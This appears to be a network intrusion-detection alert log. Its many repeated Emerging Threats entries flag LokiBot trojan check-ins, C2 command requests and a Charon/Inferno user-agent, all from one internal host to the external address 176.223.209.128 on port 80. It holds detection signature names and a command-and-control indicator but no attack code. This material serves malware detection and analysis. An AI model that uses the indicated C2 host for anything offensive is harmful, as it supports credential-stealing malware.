                                              11/25/21-10:50:15.653331TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008880192.168.11.20176.223.209.128
                                              11/25/21-10:50:16.166462TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008980192.168.11.20176.223.209.128
                                              11/25/21-10:50:16.166462TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008980192.168.11.20176.223.209.128
                                              11/25/21-10:50:16.166462TCP2025381ET TROJAN LokiBot Checkin5008980192.168.11.20176.223.209.128
                                              11/25/21-10:50:16.166462TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008980192.168.11.20176.223.209.128
                                              11/25/21-10:50:16.686571TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009080192.168.11.20176.223.209.128
                                              11/25/21-10:50:16.686571TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009080192.168.11.20176.223.209.128
                                              11/25/21-10:50:16.686571TCP2025381ET TROJAN LokiBot Checkin5009080192.168.11.20176.223.209.128
                                              11/25/21-10:50:16.686571TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009080192.168.11.20176.223.209.128
                                              11/25/21-10:50:17.195199TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009180192.168.11.20176.223.209.128
                                              11/25/21-10:50:17.195199TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009180192.168.11.20176.223.209.128
                                              11/25/21-10:50:17.195199TCP2025381ET TROJAN LokiBot Checkin5009180192.168.11.20176.223.209.128
                                              11/25/21-10:50:17.195199TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009180192.168.11.20176.223.209.128
                                              11/25/21-10:50:17.638429TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009280192.168.11.20176.223.209.128
                                              11/25/21-10:50:17.638429TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009280192.168.11.20176.223.209.128
                                              11/25/21-10:50:17.638429TCP2025381ET TROJAN LokiBot Checkin5009280192.168.11.20176.223.209.128
                                              11/25/21-10:50:17.638429TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009280192.168.11.20176.223.209.128
                                              11/25/21-10:50:18.158986TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009380192.168.11.20176.223.209.128
                                              11/25/21-10:50:18.158986TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009380192.168.11.20176.223.209.128
                                              11/25/21-10:50:18.158986TCP2025381ET TROJAN LokiBot Checkin5009380192.168.11.20176.223.209.128
                                              11/25/21-10:50:18.158986TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009380192.168.11.20176.223.209.128
                                              11/25/21-10:50:18.673645TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009480192.168.11.20176.223.209.128
                                              11/25/21-10:50:18.673645TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009480192.168.11.20176.223.209.128
                                              11/25/21-10:50:18.673645TCP2025381ET TROJAN LokiBot Checkin5009480192.168.11.20176.223.209.128
                                              11/25/21-10:50:18.673645TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009480192.168.11.20176.223.209.128
                                              11/25/21-10:50:19.184222TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009580192.168.11.20176.223.209.128
                                              11/25/21-10:50:19.184222TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009580192.168.11.20176.223.209.128
                                              11/25/21-10:50:19.184222TCP2025381ET TROJAN LokiBot Checkin5009580192.168.11.20176.223.209.128
                                              11/25/21-10:50:19.184222TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009580192.168.11.20176.223.209.128
                                              11/25/21-10:50:19.685636TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009680192.168.11.20176.223.209.128
                                              11/25/21-10:50:19.685636TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009680192.168.11.20176.223.209.128
                                              11/25/21-10:50:19.685636TCP2025381ET TROJAN LokiBot Checkin5009680192.168.11.20176.223.209.128
                                              11/25/21-10:50:19.685636TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009680192.168.11.20176.223.209.128
                                              11/25/21-10:50:20.207253TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009780192.168.11.20176.223.209.128
                                              11/25/21-10:50:20.207253TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009780192.168.11.20176.223.209.128
                                              11/25/21-10:50:20.207253TCP2025381ET TROJAN LokiBot Checkin5009780192.168.11.20176.223.209.128
                                              11/25/21-10:50:20.207253TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009780192.168.11.20176.223.209.128
                                              11/25/21-10:50:20.723424TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009880192.168.11.20176.223.209.128
                                              11/25/21-10:50:20.723424TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009880192.168.11.20176.223.209.128
                                              11/25/21-10:50:20.723424TCP2025381ET TROJAN LokiBot Checkin5009880192.168.11.20176.223.209.128
                                              11/25/21-10:50:20.723424TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009880192.168.11.20176.223.209.128
                                              11/25/21-10:50:21.159997TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009980192.168.11.20176.223.209.128
                                              11/25/21-10:50:21.159997TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009980192.168.11.20176.223.209.128
                                              11/25/21-10:50:21.159997TCP2025381ET TROJAN LokiBot Checkin5009980192.168.11.20176.223.209.128
                                              11/25/21-10:50:21.159997TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009980192.168.11.20176.223.209.128
                                              11/25/21-10:50:21.648991TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010080192.168.11.20176.223.209.128
                                              11/25/21-10:50:21.648991TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010080192.168.11.20176.223.209.128
                                              11/25/21-10:50:21.648991TCP2025381ET TROJAN LokiBot Checkin5010080192.168.11.20176.223.209.128
                                              11/25/21-10:50:21.648991TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010080192.168.11.20176.223.209.128
                                              11/25/21-10:50:22.166713TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010180192.168.11.20176.223.209.128
                                              11/25/21-10:50:22.166713TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010180192.168.11.20176.223.209.128
                                              11/25/21-10:50:22.166713TCP2025381ET TROJAN LokiBot Checkin5010180192.168.11.20176.223.209.128
                                              11/25/21-10:50:22.166713TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010180192.168.11.20176.223.209.128
                                              11/25/21-10:50:22.680856TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010280192.168.11.20176.223.209.128
                                              11/25/21-10:50:22.680856TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010280192.168.11.20176.223.209.128
                                              11/25/21-10:50:22.680856TCP2025381ET TROJAN LokiBot Checkin5010280192.168.11.20176.223.209.128
                                              11/25/21-10:50:22.680856TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010280192.168.11.20176.223.209.128
                                              11/25/21-10:50:23.190149TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010380192.168.11.20176.223.209.128
                                              11/25/21-10:50:23.190149TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010380192.168.11.20176.223.209.128
                                              11/25/21-10:50:23.190149TCP2025381ET TROJAN LokiBot Checkin5010380192.168.11.20176.223.209.128
                                              11/25/21-10:50:23.190149TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010380192.168.11.20176.223.209.128
                                              11/25/21-10:50:23.717956TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010480192.168.11.20176.223.209.128
                                              11/25/21-10:50:23.717956TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010480192.168.11.20176.223.209.128
                                              11/25/21-10:50:23.717956TCP2025381ET TROJAN LokiBot Checkin5010480192.168.11.20176.223.209.128
                                              11/25/21-10:50:23.717956TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010480192.168.11.20176.223.209.128
                                              11/25/21-10:50:24.185756TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010580192.168.11.20176.223.209.128
                                              11/25/21-10:50:24.185756TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010580192.168.11.20176.223.209.128
                                              11/25/21-10:50:24.185756TCP2025381ET TROJAN LokiBot Checkin5010580192.168.11.20176.223.209.128
                                              11/25/21-10:50:24.185756TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010580192.168.11.20176.223.209.128
                                              11/25/21-10:50:24.703007TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010680192.168.11.20176.223.209.128
                                              11/25/21-10:50:24.703007TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010680192.168.11.20176.223.209.128
                                              11/25/21-10:50:24.703007TCP2025381ET TROJAN LokiBot Checkin5010680192.168.11.20176.223.209.128
                                              11/25/21-10:50:24.703007TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010680192.168.11.20176.223.209.128
                                              11/25/21-10:50:25.332854TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010780192.168.11.20176.223.209.128
                                              11/25/21-10:50:25.332854TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010780192.168.11.20176.223.209.128
                                              11/25/21-10:50:25.332854TCP2025381ET TROJAN LokiBot Checkin5010780192.168.11.20176.223.209.128
                                              11/25/21-10:50:25.332854TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010780192.168.11.20176.223.209.128
                                              11/25/21-10:50:26.078077TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010880192.168.11.20176.223.209.128
                                              11/25/21-10:50:26.078077TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010880192.168.11.20176.223.209.128
                                              11/25/21-10:50:26.078077TCP2025381ET TROJAN LokiBot Checkin5010880192.168.11.20176.223.209.128
                                              11/25/21-10:50:26.078077TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010880192.168.11.20176.223.209.128
                                              11/25/21-10:50:26.807858TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010980192.168.11.20176.223.209.128
                                              11/25/21-10:50:26.807858TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010980192.168.11.20176.223.209.128
                                              11/25/21-10:50:26.807858TCP2025381ET TROJAN LokiBot Checkin5010980192.168.11.20176.223.209.128
                                              11/25/21-10:50:26.807858TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010980192.168.11.20176.223.209.128
                                              11/25/21-10:50:27.596260TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011080192.168.11.20176.223.209.128
                                              11/25/21-10:50:27.596260TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011080192.168.11.20176.223.209.128
                                              11/25/21-10:50:27.596260TCP2025381ET TROJAN LokiBot Checkin5011080192.168.11.20176.223.209.128
                                              11/25/21-10:50:27.596260TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011080192.168.11.20176.223.209.128
                                              11/25/21-10:50:28.402048TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011180192.168.11.20176.223.209.128
                                              11/25/21-10:50:28.402048TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011180192.168.11.20176.223.209.128
                                              11/25/21-10:50:28.402048TCP2025381ET TROJAN LokiBot Checkin5011180192.168.11.20176.223.209.128
                                              11/25/21-10:50:28.402048TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011180192.168.11.20176.223.209.128
                                              11/25/21-10:50:28.896038TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011280192.168.11.20176.223.209.128
                                              11/25/21-10:50:28.896038TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011280192.168.11.20176.223.209.128
                                              11/25/21-10:50:28.896038TCP2025381ET TROJAN LokiBot Checkin5011280192.168.11.20176.223.209.128
                                              11/25/21-10:50:28.896038TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011280192.168.11.20176.223.209.128
                                              11/25/21-10:50:29.419476TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011380192.168.11.20176.223.209.128
                                              11/25/21-10:50:29.419476TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011380192.168.11.20176.223.209.128
                                              11/25/21-10:50:29.419476TCP2025381ET TROJAN LokiBot Checkin5011380192.168.11.20176.223.209.128
                                              11/25/21-10:50:29.419476TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011380192.168.11.20176.223.209.128
                                              11/25/21-10:50:29.941230TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011480192.168.11.20176.223.209.128
                                              11/25/21-10:50:29.941230TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011480192.168.11.20176.223.209.128
                                              11/25/21-10:50:29.941230TCP2025381ET TROJAN LokiBot Checkin5011480192.168.11.20176.223.209.128
                                              11/25/21-10:50:29.941230TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011480192.168.11.20176.223.209.128
                                              11/25/21-10:50:30.460479TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011580192.168.11.20176.223.209.128
                                              11/25/21-10:50:30.460479TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011580192.168.11.20176.223.209.128
                                              11/25/21-10:50:30.460479TCP2025381ET TROJAN LokiBot Checkin5011580192.168.11.20176.223.209.128
                                              11/25/21-10:50:30.460479TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011580192.168.11.20176.223.209.128
                                              11/25/21-10:50:30.962182TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011680192.168.11.20176.223.209.128
                                              11/25/21-10:50:30.962182TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011680192.168.11.20176.223.209.128
                                              11/25/21-10:50:30.962182TCP2025381ET TROJAN LokiBot Checkin5011680192.168.11.20176.223.209.128
                                              11/25/21-10:50:30.962182TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011680192.168.11.20176.223.209.128
                                              11/25/21-10:50:31.469315TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011780192.168.11.20176.223.209.128
                                              11/25/21-10:50:31.469315TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011780192.168.11.20176.223.209.128
                                              11/25/21-10:50:31.469315TCP2025381ET TROJAN LokiBot Checkin5011780192.168.11.20176.223.209.128
                                              11/25/21-10:50:31.469315TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011780192.168.11.20176.223.209.128
                                              11/25/21-10:50:31.996695TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011880192.168.11.20176.223.209.128
                                              11/25/21-10:50:31.996695TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011880192.168.11.20176.223.209.128
                                              11/25/21-10:50:31.996695TCP2025381ET TROJAN LokiBot Checkin5011880192.168.11.20176.223.209.128
                                              11/25/21-10:50:31.996695TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011880192.168.11.20176.223.209.128
                                              11/25/21-10:50:32.501488TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011980192.168.11.20176.223.209.128
                                              11/25/21-10:50:32.501488TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011980192.168.11.20176.223.209.128
                                              11/25/21-10:50:32.501488TCP2025381ET TROJAN LokiBot Checkin5011980192.168.11.20176.223.209.128
                                              11/25/21-10:50:32.501488TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011980192.168.11.20176.223.209.128
                                              11/25/21-10:50:33.031278TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012080192.168.11.20176.223.209.128
                                              11/25/21-10:50:33.031278TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012080192.168.11.20176.223.209.128
                                              11/25/21-10:50:33.031278TCP2025381ET TROJAN LokiBot Checkin5012080192.168.11.20176.223.209.128
                                              11/25/21-10:50:33.031278TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012080192.168.11.20176.223.209.128
                                              11/25/21-10:50:33.541841TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012180192.168.11.20176.223.209.128
                                              11/25/21-10:50:33.541841TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012180192.168.11.20176.223.209.128
                                              11/25/21-10:50:33.541841TCP2025381ET TROJAN LokiBot Checkin5012180192.168.11.20176.223.209.128
                                              11/25/21-10:50:33.541841TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012180192.168.11.20176.223.209.128
                                              11/25/21-10:50:34.090399TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012280192.168.11.20176.223.209.128
                                              11/25/21-10:50:34.090399TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012280192.168.11.20176.223.209.128
                                              11/25/21-10:50:34.090399TCP2025381ET TROJAN LokiBot Checkin5012280192.168.11.20176.223.209.128
                                              11/25/21-10:50:34.090399TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012280192.168.11.20176.223.209.128
                                              11/25/21-10:50:34.608634TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012380192.168.11.20176.223.209.128
                                              11/25/21-10:50:34.608634TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012380192.168.11.20176.223.209.128
                                              11/25/21-10:50:34.608634TCP2025381ET TROJAN LokiBot Checkin5012380192.168.11.20176.223.209.128
                                              11/25/21-10:50:34.608634TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012380192.168.11.20176.223.209.128
                                              11/25/21-10:50:35.099444TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012480192.168.11.20176.223.209.128
                                              11/25/21-10:50:35.099444TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012480192.168.11.20176.223.209.128
                                              11/25/21-10:50:35.099444TCP2025381ET TROJAN LokiBot Checkin5012480192.168.11.20176.223.209.128
                                              11/25/21-10:50:35.099444TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012480192.168.11.20176.223.209.128
                                              11/25/21-10:50:35.566498TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012580192.168.11.20176.223.209.128
                                              11/25/21-10:50:35.566498TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012580192.168.11.20176.223.209.128
                                              11/25/21-10:50:35.566498TCP2025381ET TROJAN LokiBot Checkin5012580192.168.11.20176.223.209.128
                                              11/25/21-10:50:35.566498TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012580192.168.11.20176.223.209.128
                                              11/25/21-10:50:36.059383TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012680192.168.11.20176.223.209.128
                                              11/25/21-10:50:36.059383TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012680192.168.11.20176.223.209.128
                                              11/25/21-10:50:36.059383TCP2025381ET TROJAN LokiBot Checkin5012680192.168.11.20176.223.209.128
                                              11/25/21-10:50:36.059383TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012680192.168.11.20176.223.209.128
                                              11/25/21-10:50:36.558923TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012780192.168.11.20176.223.209.128
                                              11/25/21-10:50:36.558923TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012780192.168.11.20176.223.209.128
                                              11/25/21-10:50:36.558923TCP2025381ET TROJAN LokiBot Checkin5012780192.168.11.20176.223.209.128
                                              11/25/21-10:50:36.558923TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012780192.168.11.20176.223.209.128
                                              11/25/21-10:50:37.058804TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012880192.168.11.20176.223.209.128
                                              11/25/21-10:50:37.058804TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012880192.168.11.20176.223.209.128
                                              11/25/21-10:50:37.058804TCP2025381ET TROJAN LokiBot Checkin5012880192.168.11.20176.223.209.128
                                              11/25/21-10:50:37.058804TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012880192.168.11.20176.223.209.128
                                              11/25/21-10:50:37.561802TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012980192.168.11.20176.223.209.128
                                              11/25/21-10:50:37.561802TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012980192.168.11.20176.223.209.128
                                              11/25/21-10:50:37.561802TCP2025381ET TROJAN LokiBot Checkin5012980192.168.11.20176.223.209.128
                                              11/25/21-10:50:37.561802TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012980192.168.11.20176.223.209.128
                                              11/25/21-10:50:38.063390TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013080192.168.11.20176.223.209.128
                                              11/25/21-10:50:38.063390TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013080192.168.11.20176.223.209.128
                                              11/25/21-10:50:38.063390TCP2025381ET TROJAN LokiBot Checkin5013080192.168.11.20176.223.209.128
                                              11/25/21-10:50:38.063390TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013080192.168.11.20176.223.209.128
                                              11/25/21-10:50:38.501799TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013180192.168.11.20176.223.209.128
                                              11/25/21-10:50:38.501799TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013180192.168.11.20176.223.209.128
                                              11/25/21-10:50:38.501799TCP2025381ET TROJAN LokiBot Checkin5013180192.168.11.20176.223.209.128
                                              11/25/21-10:50:38.501799TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013180192.168.11.20176.223.209.128
                                              11/25/21-10:50:38.984853TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013280192.168.11.20176.223.209.128
                                              11/25/21-10:50:38.984853TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013280192.168.11.20176.223.209.128
                                              11/25/21-10:50:38.984853TCP2025381ET TROJAN LokiBot Checkin5013280192.168.11.20176.223.209.128
                                              11/25/21-10:50:38.984853TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013280192.168.11.20176.223.209.128
                                              11/25/21-10:50:39.497980TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013380192.168.11.20176.223.209.128
                                              11/25/21-10:50:39.497980TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013380192.168.11.20176.223.209.128
                                              11/25/21-10:50:39.497980TCP2025381ET TROJAN LokiBot Checkin5013380192.168.11.20176.223.209.128
                                              11/25/21-10:50:39.497980TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013380192.168.11.20176.223.209.128
                                              11/25/21-10:50:40.012551TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013480192.168.11.20176.223.209.128
                                              11/25/21-10:50:40.012551TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013480192.168.11.20176.223.209.128
                                              11/25/21-10:50:40.012551TCP2025381ET TROJAN LokiBot Checkin5013480192.168.11.20176.223.209.128
                                              11/25/21-10:50:40.012551TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013480192.168.11.20176.223.209.128
                                              11/25/21-10:50:40.520116TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013580192.168.11.20176.223.209.128
                                              11/25/21-10:50:40.520116TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013580192.168.11.20176.223.209.128
                                              11/25/21-10:50:40.520116TCP2025381ET TROJAN LokiBot Checkin5013580192.168.11.20176.223.209.128
                                              11/25/21-10:50:40.520116TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013580192.168.11.20176.223.209.128
                                              11/25/21-10:50:41.030705TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013680192.168.11.20176.223.209.128
                                              11/25/21-10:50:41.030705TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013680192.168.11.20176.223.209.128
                                              11/25/21-10:50:41.030705TCP2025381ET TROJAN LokiBot Checkin5013680192.168.11.20176.223.209.128
                                              11/25/21-10:50:41.030705TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013680192.168.11.20176.223.209.128
                                              11/25/21-10:50:41.524484TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013780192.168.11.20176.223.209.128
                                              11/25/21-10:50:41.524484TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013780192.168.11.20176.223.209.128
                                              11/25/21-10:50:41.524484TCP2025381ET TROJAN LokiBot Checkin5013780192.168.11.20176.223.209.128
                                              11/25/21-10:50:41.524484TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013780192.168.11.20176.223.209.128
                                              11/25/21-10:50:42.040785TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013880192.168.11.20176.223.209.128
                                              11/25/21-10:50:42.040785TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013880192.168.11.20176.223.209.128
                                              11/25/21-10:50:42.040785TCP2025381ET TROJAN LokiBot Checkin5013880192.168.11.20176.223.209.128
                                              11/25/21-10:50:42.040785TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013880192.168.11.20176.223.209.128
                                              11/25/21-10:50:42.534729TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013980192.168.11.20176.223.209.128
                                              11/25/21-10:50:42.534729TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013980192.168.11.20176.223.209.128
                                              11/25/21-10:50:42.534729TCP2025381ET TROJAN LokiBot Checkin5013980192.168.11.20176.223.209.128
                                              11/25/21-10:50:42.534729TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013980192.168.11.20176.223.209.128
                                              11/25/21-10:50:43.037329TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15014080192.168.11.20176.223.209.128
                                              11/25/21-10:50:43.037329TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5014080192.168.11.20176.223.209.128
                                              11/25/21-10:50:43.037329TCP2025381ET TROJAN LokiBot Checkin5014080192.168.11.20176.223.209.128
                                              11/25/21-10:50:43.037329TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25014080192.168.11.20176.223.209.128
                                              11/25/21-10:50:43.557051TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15014180192.168.11.20176.223.209.128
                                              11/25/21-10:50:43.557051TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5014180192.168.11.20176.223.209.128
                                              11/25/21-10:50:43.557051TCP2025381ET TROJAN LokiBot Checkin5014180192.168.11.20176.223.209.128
                                              11/25/21-10:50:43.557051TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25014180192.168.11.20176.223.209.128
                                              11/25/21-10:50:44.009708TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15014280192.168.11.20176.223.209.128
                                              11/25/21-10:50:44.009708TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5014280192.168.11.20176.223.209.128
                                              11/25/21-10:50:44.009708TCP2025381ET TROJAN LokiBot Checkin5014280192.168.11.20176.223.209.128
                                              11/25/21-10:50:44.009708TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25014280192.168.11.20176.223.209.128
                                              11/25/21-10:50:44.527358TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15014380192.168.11.20176.223.209.128
                                              11/25/21-10:50:44.527358TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5014380192.168.11.20176.223.209.128
                                              11/25/21-10:50:44.527358TCP2025381ET TROJAN LokiBot Checkin5014380192.168.11.20176.223.209.128
                                              11/25/21-10:50:44.527358TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25014380192.168.11.20176.223.209.128
                                              11/25/21-10:50:45.039531TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15014480192.168.11.20176.223.209.128
                                              11/25/21-10:50:45.039531TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5014480192.168.11.20176.223.209.128
                                              11/25/21-10:50:45.039531TCP2025381ET TROJAN LokiBot Checkin5014480192.168.11.20176.223.209.128
                                              11/25/21-10:50:45.039531TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25014480192.168.11.20176.223.209.128
                                              11/25/21-10:50:45.509964TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15014580192.168.11.20176.223.209.128
                                              11/25/21-10:50:45.509964TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5014580192.168.11.20176.223.209.128
                                              11/25/21-10:50:45.509964TCP2025381ET TROJAN LokiBot Checkin5014580192.168.11.20176.223.209.128
                                              11/25/21-10:50:45.509964TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25014580192.168.11.20176.223.209.128
                                              11/25/21-10:50:45.990994TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15014680192.168.11.20176.223.209.128
                                              11/25/21-10:50:45.990994TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5014680192.168.11.20176.223.209.128
                                              11/25/21-10:50:45.990994TCP2025381ET TROJAN LokiBot Checkin5014680192.168.11.20176.223.209.128
                                              11/25/21-10:50:45.990994TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25014680192.168.11.20176.223.209.128
